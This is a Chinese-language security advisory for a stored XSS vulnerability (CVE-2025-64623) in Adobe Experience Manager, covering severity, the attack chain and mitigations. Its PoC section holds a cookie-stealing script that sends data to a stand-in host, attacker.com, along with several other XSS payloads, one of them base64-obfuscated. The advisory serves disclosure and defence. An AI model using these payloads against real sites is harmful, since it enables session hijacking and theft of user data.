CVE-2025-64623 Adobe Experience Manager存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64623

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

CVE-2025-64623是Adobe Experience Manager中的一个存储型跨站脚本(XSS)安全漏洞，CVSS评分5.4，属于中等严重级别。该漏洞存在于Adobe Experience Manager 6.5.23及更早版本中。攻击者利用此漏洞可以通过低权限账户在表单字段中注入恶意JavaScript代码。由于是存储型XSS，恶意脚本会被永久保存在服务器端，当其他用户访问包含该恶意内容的页面时，攻击代码会在受害者浏览器中执行。这可能导致会话劫持、敏感信息窃取、钓鱼攻击传播或对网站进行篡改等严重后果。漏洞于2025年12月10日披露，发现者为Adobe安全团队([email protected])。由于该漏洞需要用户交互才能触发，攻击复杂度相对较高，但仍对使用受影响版本的用户构成安全威胁。建议相关用户尽快升级到修复版本以消除安全风险。

技术细节

Adobe Experience Manager 6.5.23及之前版本存在存储型XSS漏洞，源于对用户输入的过滤和转义不充分。攻击者以低权限用户身份登录系统后，可以在表单字段(如文本输入框、富文本编辑器字段、评论区域等)中注入恶意JavaScript代码。该恶意代码被服务器存储后，当其他授权用户浏览包含该字段内容的页面时，浏览器会解析并执行注入的脚本。由于攻击发生在受信任的网站上下文中，浏览器的同源策略不会阻止脚本执行，使得攻击者可以窃取用户的会话Cookie、读取页面内容、模拟用户操作或重定向用户到恶意网站。攻击利用了AV:N/AC:L/PR:L/UI:R的攻击向量，需要通过网络进行攻击，低权限即可实施，且需要受害者访问特定页面才能触发。攻击者可能通过社工手段诱导受害者访问恶意构造的页面，从而完成完整的攻击链。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标Adobe Experience Manager实例版本，确认版本在6.5.23或更早版本

STEP 2

步骤2: 低权限账户获取

攻击者获取或注册一个低权限用户账户，该账户具有访问和编辑表单字段的权限

STEP 3

步骤3: 恶意脚本注入

攻击者在AEM的表单字段(如评论、描述、名称字段等)中注入包含恶意JavaScript代码的内容

STEP 4

步骤4: 服务器端存储

恶意代码被服务器接收并永久存储在数据库或内容仓库中，无需特殊编码或过滤

STEP 5

步骤5: 诱导受害者访问

攻击者通过社工手段(钓鱼邮件、即时消息等)诱导具有访问权限的用户访问包含恶意内容的页面

STEP 6

步骤6: 脚本执行

当受害者浏览器加载页面时，注入的JavaScript代码在受害者浏览器上下文中执行

STEP 7

步骤7: 攻击成功

攻击者成功窃取用户会话Cookie、敏感信息或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-64623 Stored XSS PoC for Adobe Experience Manager -->
<!-- This PoC demonstrates the stored XSS vulnerability in AEM form fields -->

<!-- Step 1: Inject malicious JavaScript into a vulnerable form field -->
<script>
  // Malicious script to steal session cookies
  var stolenCookies = document.cookie;
  
  // Send stolen data to attacker-controlled server
  var img = new Image();
  img.src = 'https://attacker.com/steal?cookie=' + encodeURIComponent(stolenCookies);
  
  // Alternatively, perform actions on behalf of the user
  // fetch('https://attacker.com/api/collect', {
  //   method: 'POST',
  //   body: JSON.stringify({
  //     cookies: document.cookie,
  //     localStorage: localStorage,
  //     sessionStorage: sessionStorage
  //   })
  // });
</script>

<!-- Simpler payload examples -->
<img src=x onerror="alert('XSS Triggered - Cookie: '+document.cookie)">
<svg/onload=eval(atob('YWxlcnQoJ1hTUyBFeHBsb2l0ZWQnKQ=='))>

<!-- AEM specific payload targeting form components -->
<div style="background:url('javascript:alert(document.cookie)')">XSS</div>
<marquee onstart=alert('Stored XSS in AEM')>trigger</marquee>

<!-- Note: This PoC is for educational and authorized testing purposes only -->

影响范围

Adobe Experience Manager 6.5.23及更早版本

Adobe Experience Manager < 6.5.24

防御指南

临时缓解措施

在等待官方修复期间，可采取以下临时缓解措施：1)限制用户对表单字段的编辑权限，特别是对低权限账户；2)实施严格的输入验证规则，对特殊字符(<、>、'、"、script等)进行过滤或转义；3)启用Content Security Policy (CSP)限制脚本执行；4)对现有内容进行全面扫描，清理潜在的恶意脚本；5)加强用户认证和会话管理，实施多因素认证；6)监控应用日志，及时发现异常请求和注入行为。建议尽快升级到官方修复版本以彻底消除该漏洞风险。